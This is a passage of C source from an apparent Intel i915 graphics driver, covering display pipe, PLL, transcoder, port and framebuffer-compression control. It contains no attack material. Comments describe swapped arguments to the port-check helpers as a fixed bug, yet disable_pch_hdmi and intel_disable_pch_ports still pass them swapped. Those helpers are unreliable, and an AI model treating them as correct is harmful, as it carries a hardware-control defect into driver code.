 * After disabling a pipe, we can't wait for vblank in the usual way,
 * spinning on the vblank interrupt status bit, since we won't actually
 * see an interrupt when the pipe is disabled.
 *
 * On Gen4 and above:
 *   wait for the pipe register state bit to turn off
 *
 * Otherwise:
 *   wait for the display line value to settle (it usually
 *   ends up stopping at the start of the next frame).
 *
 * Both paths time out after roughly 100ms and log a debug message.
 */
void intel_wait_for_pipe_off(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (INTEL_INFO(dev)->gen >= 4) {
int reg = PIPECONF(pipe);
/* Wait for the Pipe State to go off */
if (wait_for((I915_READ(reg) & I965_PIPECONF_ACTIVE) == 0,
100))
DRM_DEBUG_KMS("pipe_off wait timed out\n");
} else {
u32 last_line;
int reg = PIPEDSL(pipe);
unsigned long timeout = jiffies + msecs_to_jiffies(100);
/* Wait for the display line to settle */
do {
last_line = I915_READ(reg) & DSL_LINEMASK;
mdelay(5);
/* Stable scanline across a 5ms window => pipe has stopped. */
} while (((I915_READ(reg) & DSL_LINEMASK) != last_line) &&
time_after(timeout, jiffies));
if (time_after(jiffies, timeout))
DRM_DEBUG_KMS("pipe_off wait timed out\n");
}
}
/* Human-readable form of an enable flag for assertion messages. */
static const char *state_string(bool enabled)
{
	if (enabled)
		return "on";
	return "off";
}
/* Only for pre-ILK configs */
/* WARN if the pipe's DPLL enable bit doesn't match the expected @state. */
static void assert_pll(struct drm_i915_private *dev_priv,
		       enum pipe pipe, bool state)
{
	u32 val = I915_READ(DPLL(pipe));
	bool cur_state = !!(val & DPLL_VCO_ENABLE);

	WARN(cur_state != state,
	     "PLL state assertion failure (expected %s, current %s)\n",
	     state_string(state), state_string(cur_state));
}
#define assert_pll_enabled(d, p) assert_pll(d, p, true)
#define assert_pll_disabled(d, p) assert_pll(d, p, false)
/* For ILK+ */
/* WARN if the PCH DPLL enable bit doesn't match the expected @state. */
static void assert_pch_pll(struct drm_i915_private *dev_priv,
			   enum pipe pipe, bool state)
{
	u32 val = I915_READ(PCH_DPLL(pipe));
	bool cur_state = !!(val & DPLL_VCO_ENABLE);

	WARN(cur_state != state,
	     "PCH PLL state assertion failure (expected %s, current %s)\n",
	     state_string(state), state_string(cur_state));
}
#define assert_pch_pll_enabled(d, p) assert_pch_pll(d, p, true)
#define assert_pch_pll_disabled(d, p) assert_pch_pll(d, p, false)
/* WARN if the FDI TX enable bit doesn't match the expected @state. */
static void assert_fdi_tx(struct drm_i915_private *dev_priv,
			  enum pipe pipe, bool state)
{
	u32 val = I915_READ(FDI_TX_CTL(pipe));
	bool cur_state = !!(val & FDI_TX_ENABLE);

	WARN(cur_state != state,
	     "FDI TX state assertion failure (expected %s, current %s)\n",
	     state_string(state), state_string(cur_state));
}
#define assert_fdi_tx_enabled(d, p) assert_fdi_tx(d, p, true)
#define assert_fdi_tx_disabled(d, p) assert_fdi_tx(d, p, false)
/* WARN if the FDI RX enable bit doesn't match the expected @state. */
static void assert_fdi_rx(struct drm_i915_private *dev_priv,
			  enum pipe pipe, bool state)
{
	u32 val = I915_READ(FDI_RX_CTL(pipe));
	bool cur_state = !!(val & FDI_RX_ENABLE);

	WARN(cur_state != state,
	     "FDI RX state assertion failure (expected %s, current %s)\n",
	     state_string(state), state_string(cur_state));
}
#define assert_fdi_rx_enabled(d, p) assert_fdi_rx(d, p, true)
#define assert_fdi_rx_disabled(d, p) assert_fdi_rx(d, p, false)
/* WARN if the FDI TX PLL is off (Gen6+; it is always on for Gen5). */
static void assert_fdi_tx_pll_enabled(struct drm_i915_private *dev_priv,
				      enum pipe pipe)
{
	u32 val;

	/* ILK FDI PLL is always enabled */
	if (dev_priv->info->gen == 5)
		return;

	val = I915_READ(FDI_TX_CTL(pipe));
	WARN(!(val & FDI_TX_PLL_ENABLE), "FDI TX PLL assertion failure, should be active but is disabled\n");
}
/* WARN if the FDI RX PLL is off. */
static void assert_fdi_rx_pll_enabled(struct drm_i915_private *dev_priv,
				      enum pipe pipe)
{
	u32 val = I915_READ(FDI_RX_CTL(pipe));

	WARN(!(val & FDI_RX_PLL_ENABLE), "FDI RX PLL assertion failure, should be active but is disabled\n");
}
/*
 * WARN if the panel power sequencer has the registers for @pipe locked.
 * "Unlocked" means the panel is off, or the unlock key is written to the
 * power control register. The panel's pipe is read from the LVDS port
 * pipe-select bit (defaults to pipe A).
 */
static void assert_panel_unlocked(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int pp_reg, lvds_reg;
u32 val;
enum pipe panel_pipe = PIPE_A;
bool locked = true;
/* Panel/LVDS registers move behind the PCH on ILK+ */
if (HAS_PCH_SPLIT(dev_priv->dev)) {
pp_reg = PCH_PP_CONTROL;
lvds_reg = PCH_LVDS;
} else {
pp_reg = PP_CONTROL;
lvds_reg = LVDS;
}
val = I915_READ(pp_reg);
if (!(val & PANEL_POWER_ON) ||
((val & PANEL_UNLOCK_REGS) == PANEL_UNLOCK_REGS))
locked = false;
if (I915_READ(lvds_reg) & LVDS_PIPEB_SELECT)
panel_pipe = PIPE_B;
WARN(panel_pipe == pipe && locked,
"panel assertion failure, pipe %c regs locked\n",
pipe_name(pipe));
}
/* WARN if the pipe's enable bit doesn't match the expected @state. */
static void assert_pipe(struct drm_i915_private *dev_priv,
			enum pipe pipe, bool state)
{
	u32 val = I915_READ(PIPECONF(pipe));
	bool cur_state = !!(val & PIPECONF_ENABLE);

	WARN(cur_state != state,
	     "pipe %c assertion failure (expected %s, current %s)\n",
	     pipe_name(pipe), state_string(state), state_string(cur_state));
}
#define assert_pipe_enabled(d, p) assert_pipe(d, p, true)
#define assert_pipe_disabled(d, p) assert_pipe(d, p, false)
/* WARN if the display plane is not enabled. */
static void assert_plane_enabled(struct drm_i915_private *dev_priv,
				 enum plane plane)
{
	u32 val = I915_READ(DSPCNTR(plane));

	WARN(!(val & DISPLAY_PLANE_ENABLE),
	     "plane %c assertion failure, should be active but is disabled\n",
	     plane_name(plane));
}
/*
 * WARN if any enabled display plane is still sourcing from @pipe.
 * Pre-ILK planes can select either pipe, so both must be checked;
 * on ILK+ planes are fixed to pipes and the check is unnecessary.
 */
static void assert_planes_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg, i;
u32 val;
int cur_pipe;
/* Planes are fixed to pipes on ILK+ */
if (HAS_PCH_SPLIT(dev_priv->dev))
return;
/* Need to check both planes against the pipe */
for (i = 0; i < 2; i++) {
reg = DSPCNTR(i);
val = I915_READ(reg);
cur_pipe = (val & DISPPLANE_SEL_PIPE_MASK) >>
DISPPLANE_SEL_PIPE_SHIFT;
WARN((val & DISPLAY_PLANE_ENABLE) && pipe == cur_pipe,
"plane %c assertion failure, should be off on pipe %c but is still active\n",
plane_name(i), pipe_name(pipe));
}
}
/* WARN unless at least one PCH reference clock source is selected. */
static void assert_pch_refclk_enabled(struct drm_i915_private *dev_priv)
{
	u32 val = I915_READ(PCH_DREF_CONTROL);
	bool enabled = !!(val & (DREF_SSC_SOURCE_MASK |
				 DREF_NONSPREAD_SOURCE_MASK |
				 DREF_SUPERSPREAD_SOURCE_MASK));

	WARN(!enabled, "PCH refclk assertion failure, should be active but is disabled\n");
}
/* WARN if the PCH transcoder for @pipe is still enabled. */
static void assert_transcoder_disabled(struct drm_i915_private *dev_priv,
				       enum pipe pipe)
{
	u32 val = I915_READ(TRANSCONF(pipe));
	bool enabled = !!(val & TRANS_ENABLE);

	WARN(enabled,
	     "transcoder assertion failed, should be off on pipe %c but is still active\n",
	     pipe_name(pipe));
}
/*
 * Is the DP port whose control value is @val driving @pipe? On CPT the
 * routing lives in the transcoder's TRANS_DP_CTL port-select field;
 * elsewhere it is the pipe-select bits in the port register itself.
 */
static bool dp_pipe_enabled(struct drm_i915_private *dev_priv,
			    enum pipe pipe, u32 port_sel, u32 val)
{
	if (!(val & DP_PORT_EN))
		return false;

	if (HAS_PCH_CPT(dev_priv->dev)) {
		u32 trans_dp_ctl = I915_READ(TRANS_DP_CTL(pipe));

		return (trans_dp_ctl & TRANS_DP_PORT_SEL_MASK) == port_sel;
	}

	return (val & DP_PIPE_MASK) == (pipe << 30);
}
/* Is the HDMI port whose control value is @val driving @pipe? */
static bool hdmi_pipe_enabled(struct drm_i915_private *dev_priv,
			      enum pipe pipe, u32 val)
{
	if (!(val & PORT_ENABLE))
		return false;

	if (HAS_PCH_CPT(dev_priv->dev))
		return (val & PORT_TRANS_SEL_MASK) == PORT_TRANS_SEL_CPT(pipe);

	return (val & TRANSCODER_MASK) == TRANSCODER(pipe);
}
/* Is the LVDS port whose control value is @val driving @pipe? */
static bool lvds_pipe_enabled(struct drm_i915_private *dev_priv,
			      enum pipe pipe, u32 val)
{
	if (!(val & LVDS_PORT_EN))
		return false;

	if (HAS_PCH_CPT(dev_priv->dev))
		return (val & PORT_TRANS_SEL_MASK) == PORT_TRANS_SEL_CPT(pipe);

	return (val & LVDS_PIPE_MASK) == LVDS_PIPE(pipe);
}
/* Is the analog (VGA/ADPA) port whose control value is @val driving @pipe? */
static bool adpa_pipe_enabled(struct drm_i915_private *dev_priv,
			      enum pipe pipe, u32 val)
{
	if (!(val & ADPA_DAC_ENABLE))
		return false;

	if (HAS_PCH_CPT(dev_priv->dev))
		return (val & PORT_TRANS_SEL_MASK) == PORT_TRANS_SEL_CPT(pipe);

	return (val & ADPA_PIPE_SELECT_MASK) == ADPA_PIPE_SELECT(pipe);
}
/* WARN if the PCH DP port @reg is enabled on transcoder @pipe. */
static void assert_pch_dp_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe, int reg, u32 port_sel)
{
u32 val = I915_READ(reg);
WARN(dp_pipe_enabled(dev_priv, pipe, port_sel, val),
"PCH DP (0x%08x) enabled on transcoder %c, should be disabled\n",
reg, pipe_name(pipe));
}
/* WARN if the PCH HDMI port @reg is enabled on transcoder @pipe. */
static void assert_pch_hdmi_disabled(struct drm_i915_private *dev_priv,
				     enum pipe pipe, int reg)
{
	u32 val = I915_READ(reg);

	/*
	 * Bug fix: hdmi_pipe_enabled() is declared (dev_priv, pipe, val)
	 * but was called with (dev_priv, val, pipe), so the pipe and the
	 * register value were swapped and the assertion checked garbage.
	 * The WARN message also said "PCH DP" (copy-paste from the DP
	 * variant); it now correctly says "PCH HDMI".
	 */
	WARN(hdmi_pipe_enabled(dev_priv, pipe, val),
	     "PCH HDMI (0x%08x) enabled on transcoder %c, should be disabled\n",
	     reg, pipe_name(pipe));
}
/*
 * WARN if any PCH port (DP B/C/D, VGA, LVDS, HDMI B/C/D) is still
 * enabled on transcoder @pipe; all must be off before the transcoder
 * can be disabled.
 */
static void assert_pch_ports_disabled(struct drm_i915_private *dev_priv,
				      enum pipe pipe)
{
	int reg;
	u32 val;

	assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_B, TRANS_DP_PORT_SEL_B);
	assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_C, TRANS_DP_PORT_SEL_C);
	assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_D, TRANS_DP_PORT_SEL_D);

	reg = PCH_ADPA;
	val = I915_READ(reg);
	/*
	 * Bug fix: adpa_pipe_enabled() and lvds_pipe_enabled() take
	 * (dev_priv, pipe, val); the original calls passed (dev_priv,
	 * val, pipe), swapping the arguments so the checks tested garbage.
	 */
	WARN(adpa_pipe_enabled(dev_priv, pipe, val),
	     "PCH VGA enabled on transcoder %c, should be disabled\n",
	     pipe_name(pipe));

	reg = PCH_LVDS;
	val = I915_READ(reg);
	WARN(lvds_pipe_enabled(dev_priv, pipe, val),
	     "PCH LVDS enabled on transcoder %c, should be disabled\n",
	     pipe_name(pipe));

	assert_pch_hdmi_disabled(dev_priv, pipe, HDMIB);
	assert_pch_hdmi_disabled(dev_priv, pipe, HDMIC);
	assert_pch_hdmi_disabled(dev_priv, pipe, HDMID);
}
/**
 * intel_enable_pll - enable a PLL
 * @dev_priv: i915 private structure
 * @pipe: pipe PLL to enable
 *
 * Enable @pipe's PLL so we can start pumping pixels from a plane. Check to
 * make sure the PLL reg is writable first though, since the panel write
 * protect mechanism may be enabled.
 *
 * Note! This is for pre-ILK only.
 */
static void intel_enable_pll(struct drm_i915_private *dev_priv, enum pipe pipe)
{
int reg;
u32 val;
/* No really, not for ILK+ */
BUG_ON(dev_priv->info->gen >= 5);
/* PLL is protected by panel, make sure we can write it */
if (IS_MOBILE(dev_priv->dev) && !IS_I830(dev_priv->dev))
assert_panel_unlocked(dev_priv, pipe);
reg = DPLL(pipe);
val = I915_READ(reg);
val |= DPLL_VCO_ENABLE;
/* We do this three times for luck */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
}
/**
 * intel_disable_pll - disable a PLL
 * @dev_priv: i915 private structure
 * @pipe: pipe PLL to disable
 *
 * Disable the PLL for @pipe, making sure the pipe is off first.
 *
 * Note! This is for pre-ILK only.
 */
static void intel_disable_pll(struct drm_i915_private *dev_priv, enum pipe pipe)
{
int reg;
u32 val;
/* Don't disable pipe A or pipe A PLLs if needed */
if (pipe == PIPE_A && (dev_priv->quirks & QUIRK_PIPEA_FORCE))
return;
/* Make sure the pipe isn't still relying on us */
assert_pipe_disabled(dev_priv, pipe);
reg = DPLL(pipe);
val = I915_READ(reg);
val &= ~DPLL_VCO_ENABLE;
I915_WRITE(reg, val);
POSTING_READ(reg);
}
/**
 * intel_enable_pch_pll - enable PCH PLL
 * @dev_priv: i915 private structure
 * @pipe: pipe PLL to enable
 *
 * The PCH PLL needs to be enabled before the PCH transcoder, since it
 * drives the transcoder clock.
 */
static void intel_enable_pch_pll(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* PCH only available on ILK+ */
BUG_ON(dev_priv->info->gen < 5);
/* PCH refclock must be enabled first */
assert_pch_refclk_enabled(dev_priv);
reg = PCH_DPLL(pipe);
val = I915_READ(reg);
val |= DPLL_VCO_ENABLE;
I915_WRITE(reg, val);
POSTING_READ(reg);
/* allow the PLL to stabilize */
udelay(200);
}
/*
 * Disable the PCH PLL for @pipe, after verifying the transcoder it
 * drives is already off. ILK+ only.
 */
static void intel_disable_pch_pll(struct drm_i915_private *dev_priv,
				  enum pipe pipe)
{
	int reg = PCH_DPLL(pipe);
	u32 val;

	/* PCH only available on ILK+ */
	BUG_ON(dev_priv->info->gen < 5);

	/* Make sure transcoder isn't still depending on us */
	assert_transcoder_disabled(dev_priv, pipe);

	val = I915_READ(reg) & ~DPLL_VCO_ENABLE;
	I915_WRITE(reg, val);
	POSTING_READ(reg);
	udelay(200);
}
/*
 * Enable the PCH transcoder for @pipe. Requires the PCH DPLL and both
 * FDI directions already enabled. Waits up to 100ms for the hardware
 * enable-status bit. ILK+ only.
 */
static void intel_enable_transcoder(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* PCH only available on ILK+ */
BUG_ON(dev_priv->info->gen < 5);
/* Make sure PCH DPLL is enabled */
assert_pch_pll_enabled(dev_priv, pipe);
/* FDI must be feeding us bits for PCH ports */
assert_fdi_tx_enabled(dev_priv, pipe);
assert_fdi_rx_enabled(dev_priv, pipe);
reg = TRANSCONF(pipe);
val = I915_READ(reg);
if (HAS_PCH_IBX(dev_priv->dev)) {
/*
 * make the BPC in transcoder be consistent with
 * that in pipeconf reg.
 */
val &= ~PIPE_BPC_MASK;
val |= I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK;
}
I915_WRITE(reg, val | TRANS_ENABLE);
if (wait_for(I915_READ(reg) & TRANS_STATE_ENABLE, 100))
DRM_ERROR("failed to enable transcoder %d\n", pipe);
}
/*
 * Disable the PCH transcoder for @pipe. FDI and all PCH ports must be
 * off first. Waits up to 50ms for the enable-status bit to clear.
 */
static void intel_disable_transcoder(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* FDI relies on the transcoder */
assert_fdi_tx_disabled(dev_priv, pipe);
assert_fdi_rx_disabled(dev_priv, pipe);
/* Ports must be off as well */
assert_pch_ports_disabled(dev_priv, pipe);
reg = TRANSCONF(pipe);
val = I915_READ(reg);
val &= ~TRANS_ENABLE;
I915_WRITE(reg, val);
/* wait for PCH transcoder off, transcoder state */
if (wait_for((I915_READ(reg) & TRANS_STATE_ENABLE) == 0, 50))
DRM_ERROR("failed to disable transcoder\n");
}
/**
 * intel_enable_pipe - enable a pipe, asserting requirements
 * @dev_priv: i915 private structure
 * @pipe: pipe to enable
 * @pch_port: on ILK+, is this pipe driving a PCH port or not
 *
 * Enable @pipe, making sure that various hardware specific requirements
 * are met, if applicable, e.g. PLL enabled, LVDS pairs enabled, etc.
 *
 * @pipe should be %PIPE_A or %PIPE_B.
 *
 * Will wait until the pipe is actually running (i.e. first vblank) before
 * returning.
 */
static void intel_enable_pipe(struct drm_i915_private *dev_priv, enum pipe pipe,
bool pch_port)
{
int reg;
u32 val;
/*
 * A pipe without a PLL won't actually be able to drive bits from
 * a plane. On ILK+ the pipe PLLs are integrated, so we don't
 * need the check.
 */
if (!HAS_PCH_SPLIT(dev_priv->dev))
assert_pll_enabled(dev_priv, pipe);
else {
if (pch_port) {
/* if driving the PCH, we need FDI enabled */
assert_fdi_rx_pll_enabled(dev_priv, pipe);
assert_fdi_tx_pll_enabled(dev_priv, pipe);
}
/* FIXME: assert CPU port conditions for SNB+ */
}
reg = PIPECONF(pipe);
val = I915_READ(reg);
/* Already on: nothing to do. */
if (val & PIPECONF_ENABLE)
return;
I915_WRITE(reg, val | PIPECONF_ENABLE);
intel_wait_for_vblank(dev_priv->dev, pipe);
}
/**
 * intel_disable_pipe - disable a pipe, asserting requirements
 * @dev_priv: i915 private structure
 * @pipe: pipe to disable
 *
 * Disable @pipe, making sure that various hardware specific requirements
 * are met, if applicable, e.g. plane disabled, panel fitter off, etc.
 *
 * @pipe should be %PIPE_A or %PIPE_B.
 *
 * Will wait until the pipe has shut down before returning.
 */
static void intel_disable_pipe(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/*
 * Make sure planes won't keep trying to pump pixels to us,
 * or we might hang the display.
 */
assert_planes_disabled(dev_priv, pipe);
/* Don't disable pipe A or pipe A PLLs if needed */
if (pipe == PIPE_A && (dev_priv->quirks & QUIRK_PIPEA_FORCE))
return;
reg = PIPECONF(pipe);
val = I915_READ(reg);
/* Already off: nothing to do. */
if ((val & PIPECONF_ENABLE) == 0)
return;
I915_WRITE(reg, val & ~PIPECONF_ENABLE);
intel_wait_for_pipe_off(dev_priv->dev, pipe);
}
/*
 * Plane regs are double buffered, going from enabled->disabled needs a
 * trigger in order to latch. The display address reg provides this.
 */
static void intel_flush_display_plane(struct drm_i915_private *dev_priv,
enum plane plane)
{
/* Write-back of the current values acts as the latch trigger. */
I915_WRITE(DSPADDR(plane), I915_READ(DSPADDR(plane)));
I915_WRITE(DSPSURF(plane), I915_READ(DSPSURF(plane)));
}
/**
 * intel_enable_plane - enable a display plane on a given pipe
 * @dev_priv: i915 private structure
 * @plane: plane to enable
 * @pipe: pipe being fed
 *
 * Enable @plane on @pipe, making sure that @pipe is running first.
 */
static void intel_enable_plane(struct drm_i915_private *dev_priv,
			       enum plane plane, enum pipe pipe)
{
	int reg;
	u32 val;

	/* If the pipe isn't enabled, we can't pump pixels and may hang */
	assert_pipe_enabled(dev_priv, pipe);

	reg = DSPCNTR(plane);
	val = I915_READ(reg);
	/* Already enabled: nothing to do. */
	if (val & DISPLAY_PLANE_ENABLE)
		return;

	I915_WRITE(reg, val | DISPLAY_PLANE_ENABLE);
	/* Latch the double-buffered plane registers, then wait a vblank
	 * so the enable has actually taken effect before returning. */
	intel_flush_display_plane(dev_priv, plane);
	intel_wait_for_vblank(dev_priv->dev, pipe);
}
/**
 * intel_disable_plane - disable a display plane
 * @dev_priv: i915 private structure
 * @plane: plane to disable
 * @pipe: pipe consuming the data
 *
 * Disable @plane; should be an independent operation.
 */
static void intel_disable_plane(struct drm_i915_private *dev_priv,
				enum plane plane, enum pipe pipe)
{
	int reg;
	u32 val;

	reg = DSPCNTR(plane);
	val = I915_READ(reg);
	/* Already disabled: nothing to do. */
	if ((val & DISPLAY_PLANE_ENABLE) == 0)
		return;

	I915_WRITE(reg, val & ~DISPLAY_PLANE_ENABLE);
	/* Latch the disable and wait a vblank for it to take effect. */
	intel_flush_display_plane(dev_priv, plane);
	intel_wait_for_vblank(dev_priv->dev, pipe);
}
/* Turn off a PCH DisplayPort port (@reg) if it is currently driving @pipe.
 * @port_sel is the transcoder port-select value used to match CPT-style
 * routing; untouched if the port is not feeding this pipe. */
static void disable_pch_dp(struct drm_i915_private *dev_priv,
			   enum pipe pipe, int reg, u32 port_sel)
{
	u32 val = I915_READ(reg);
	if (dp_pipe_enabled(dev_priv, pipe, port_sel, val)) {
		DRM_DEBUG_KMS("Disabling pch dp %x on pipe %d\n", reg, pipe);
		I915_WRITE(reg, val & ~DP_PORT_EN);
	}
}
/* Turn off a PCH HDMI port (@reg) if it is currently driving @pipe. */
static void disable_pch_hdmi(struct drm_i915_private *dev_priv,
			     enum pipe pipe, int reg)
{
	u32 val = I915_READ(reg);
	if (hdmi_pipe_enabled(dev_priv, val, pipe)) {
		DRM_DEBUG_KMS("Disabling pch HDMI %x on pipe %d\n",
			      reg, pipe);
		I915_WRITE(reg, val & ~PORT_ENABLE);
	}
}
/* Disable any ports connected to this transcoder: DP B/C/D, analog (ADPA),
 * LVDS and HDMI B/C/D.  Panel registers are unlocked first so the LVDS/eDP
 * power sequencing bits can be written. */
static void intel_disable_pch_ports(struct drm_i915_private *dev_priv,
				    enum pipe pipe)
{
	u32 reg, val;

	/* Unlock the panel power-sequencer registers before touching ports. */
	val = I915_READ(PCH_PP_CONTROL);
	I915_WRITE(PCH_PP_CONTROL, val | PANEL_UNLOCK_REGS);

	disable_pch_dp(dev_priv, pipe, PCH_DP_B, TRANS_DP_PORT_SEL_B);
	disable_pch_dp(dev_priv, pipe, PCH_DP_C, TRANS_DP_PORT_SEL_C);
	disable_pch_dp(dev_priv, pipe, PCH_DP_D, TRANS_DP_PORT_SEL_D);

	/* Analog CRT DAC output */
	reg = PCH_ADPA;
	val = I915_READ(reg);
	if (adpa_pipe_enabled(dev_priv, val, pipe))
		I915_WRITE(reg, val & ~ADPA_DAC_ENABLE);

	reg = PCH_LVDS;
	val = I915_READ(reg);
	if (lvds_pipe_enabled(dev_priv, val, pipe)) {
		DRM_DEBUG_KMS("disable lvds on pipe %d val 0x%08x\n", pipe, val);
		I915_WRITE(reg, val & ~LVDS_PORT_EN);
		/* Flush the write and give the LVDS port time to shut down. */
		POSTING_READ(reg);
		udelay(100);
	}

	disable_pch_hdmi(dev_priv, pipe, HDMIB);
	disable_pch_hdmi(dev_priv, pipe, HDMIC);
	disable_pch_hdmi(dev_priv, pipe, HDMID);
}
/* Disable legacy (8xx-style) framebuffer compression and wait for the
 * compressor to go idle. */
static void i8xx_disable_fbc(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 fbc_ctl;

	/* Disable compression */
	fbc_ctl = I915_READ(FBC_CONTROL);
	/* Already off: nothing to do. */
	if ((fbc_ctl & FBC_CTL_EN) == 0)
		return;

	fbc_ctl &= ~FBC_CTL_EN;
	I915_WRITE(FBC_CONTROL, fbc_ctl);

	/* Wait for compressing bit to clear */
	if (wait_for((I915_READ(FBC_STATUS) & FBC_STAT_COMPRESSING) == 0, 10)) {
		DRM_DEBUG_KMS("FBC idle timed out\n");
		return;
	}

	DRM_DEBUG_KMS("disabled FBC\n");
}
/* Enable legacy (8xx-style) framebuffer compression for @crtc's plane,
 * recompressing at most every @interval frames.  Assumes the scanout object
 * is X-tiled and fenced (enforced by intel_update_fbc()). */
static void i8xx_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_framebuffer *fb = crtc->fb;
	struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
	struct drm_i915_gem_object *obj = intel_fb->obj;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int cfb_pitch;
	int plane, i;
	u32 fbc_ctl, fbc_ctl2;

	/* Compressed-buffer pitch is bounded by both the CFB size and the
	 * framebuffer's own pitch. */
	cfb_pitch = dev_priv->cfb_size / FBC_LL_SIZE;
	if (fb->pitch < cfb_pitch)
		cfb_pitch = fb->pitch;

	/* FBC_CTL wants 64B units */
	cfb_pitch = (cfb_pitch / 64) - 1;
	plane = intel_crtc->plane == 0 ? FBC_CTL_PLANEA : FBC_CTL_PLANEB;

	/* Clear old tags */
	for (i = 0; i < (FBC_LL_SIZE / 32) + 1; i++)
		I915_WRITE(FBC_TAG + (i * 4), 0);

	/* Set it up... */
	fbc_ctl2 = FBC_CTL_FENCE_DBL | FBC_CTL_IDLE_IMM | FBC_CTL_CPU_FENCE;
	fbc_ctl2 |= plane;
	I915_WRITE(FBC_CONTROL2, fbc_ctl2);
	I915_WRITE(FBC_FENCE_OFF, crtc->y);

	/* enable it... */
	fbc_ctl = FBC_CTL_EN | FBC_CTL_PERIODIC;
	if (IS_I945GM(dev))
		fbc_ctl |= FBC_CTL_C3_IDLE; /* 945 needs special SR handling */
	fbc_ctl |= (cfb_pitch & 0xff) << FBC_CTL_STRIDE_SHIFT;
	/* NOTE(review): mask 0x2fff skips bit 12 of the interval; looks odd
	 * (0x3fff would be contiguous) but is long-standing behavior —
	 * confirm against the hardware PRM before changing. */
	fbc_ctl |= (interval & 0x2fff) << FBC_CTL_INTERVAL_SHIFT;
	fbc_ctl |= obj->fence_reg;
	I915_WRITE(FBC_CONTROL, fbc_ctl);

	DRM_DEBUG_KMS("enabled FBC, pitch %d, yoff %d, plane %d, ",
		      cfb_pitch, crtc->y, intel_crtc->plane);
}
static bool i8xx_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(FBC_CONTROL) & FBC_CTL_EN;
}
/* Enable G4x-style (DPFC) framebuffer compression for @crtc's plane,
 * recompressing at most every @interval frames. */
static void g4x_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_framebuffer *fb = crtc->fb;
	struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
	struct drm_i915_gem_object *obj = intel_fb->obj;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int plane = intel_crtc->plane == 0 ? DPFC_CTL_PLANEA : DPFC_CTL_PLANEB;
	unsigned long stall_watermark = 200;
	u32 dpfc_ctl;

	/* Fence-based CPU-write detection requires the scanout to be fenced
	 * (enforced by intel_update_fbc()). */
	dpfc_ctl = plane | DPFC_SR_EN | DPFC_CTL_LIMIT_1X;
	dpfc_ctl |= DPFC_CTL_FENCE_EN | obj->fence_reg;
	I915_WRITE(DPFC_CHICKEN, DPFC_HT_MODIFY);

	I915_WRITE(DPFC_RECOMP_CTL, DPFC_RECOMP_STALL_EN |
		   (stall_watermark << DPFC_RECOMP_STALL_WM_SHIFT) |
		   (interval << DPFC_RECOMP_TIMER_COUNT_SHIFT));
	I915_WRITE(DPFC_FENCE_YOFF, crtc->y);

	/* enable it... */
	I915_WRITE(DPFC_CONTROL, I915_READ(DPFC_CONTROL) | DPFC_CTL_EN);

	DRM_DEBUG_KMS("enabled fbc on plane %d\n", intel_crtc->plane);
}
/* Disable G4x-style (DPFC) framebuffer compression if it is active. */
static void g4x_disable_fbc(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 ctl;

	/* Disable compression */
	ctl = I915_READ(DPFC_CONTROL);
	if ((ctl & DPFC_CTL_EN) == 0)
		return;

	I915_WRITE(DPFC_CONTROL, ctl & ~DPFC_CTL_EN);
	DRM_DEBUG_KMS("disabled FBC\n");
}
static bool g4x_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(DPFC_CONTROL) & DPFC_CTL_EN;
}
/* Make the SNB blitter notify FBC of its writes so the compressor can
 * invalidate stale compressed data.  The ECOSKPD register is lock-protected:
 * each value must first be written with the bit replicated into the lock
 * (shifted) half to unlock it, hence the three-write dance below. */
static void sandybridge_blit_fbc_update(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 blt_ecoskpd;

	/* Make sure blitter notifies FBC of writes */
	gen6_gt_force_wake_get(dev_priv);
	blt_ecoskpd = I915_READ(GEN6_BLITTER_ECOSKPD);
	/* ...unlock the FBC_NOTIFY bit... */
	blt_ecoskpd |= GEN6_BLITTER_FBC_NOTIFY <<
		GEN6_BLITTER_LOCK_SHIFT;
	I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
	/* ...set it... */
	blt_ecoskpd |= GEN6_BLITTER_FBC_NOTIFY;
	I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
	/* ...and re-lock it. */
	blt_ecoskpd &= ~(GEN6_BLITTER_FBC_NOTIFY <<
			 GEN6_BLITTER_LOCK_SHIFT);
	I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
	POSTING_READ(GEN6_BLITTER_ECOSKPD);
	gen6_gt_force_wake_put(dev_priv);
}
/* Enable Ironlake/Sandybridge (ILK DPFC) framebuffer compression for
 * @crtc's plane, recompressing at most every @interval frames.  On GEN6 a
 * CPU fence is additionally programmed and the blitter is told to notify
 * FBC of its writes. */
static void ironlake_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
	struct drm_device *dev = crtc->dev;
